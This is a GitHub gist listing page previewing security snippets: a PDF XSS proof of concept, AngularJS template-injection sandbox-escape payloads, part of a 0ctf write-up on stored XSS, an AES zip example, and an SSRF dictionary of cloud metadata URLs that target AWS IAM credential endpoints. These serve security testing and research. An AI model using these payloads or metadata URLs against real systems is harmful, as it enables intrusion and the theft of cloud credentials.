Skip to content

Instantly share code, notes, and snippets.

View Bo0oM's full-sized avatar
💣
3, 2, 1...

Anton Lopanitsyn Bo0oM

💣
3, 2, 1...
View GitHub Profile
@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active November 16, 2024 15:30
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@andripwn
andripwn / poc.js
Created January 23, 2020 16:29
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")
@danifus
danifus / create_aes_zip.py
Created July 27, 2019 03:18
Implementing Winzip AES encryption / decryption with zipfile refactor
import zipfile
import zipfile_aes
secret_password = b'lost art of keeping a secret'
with zipfile_aes.AESZipFile('new_test.zip',
'w',
compression=zipfile.ZIP_LZMA,
encryption=zipfile_aes.WZ_AES) as zf:
zf.setpassword(secret_password)
@paul-axe
paul-axe / 0ctf_2018_quals_writeups.md
Created April 2, 2018 18:03
0ctf_2018_quals_writeups

h4x0rs.club 2

Application was built from 2 parts - frontend page (https://h4x0rs.club/game/) and backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:

  1. Stored XSS on user profile page.

It's also possible to make victim browser trigger a click on injected element

if(location.hash.slice(1) == 'report'){
            document.getElementById('report-btn').click();
@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active September 30, 2024 02:53
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]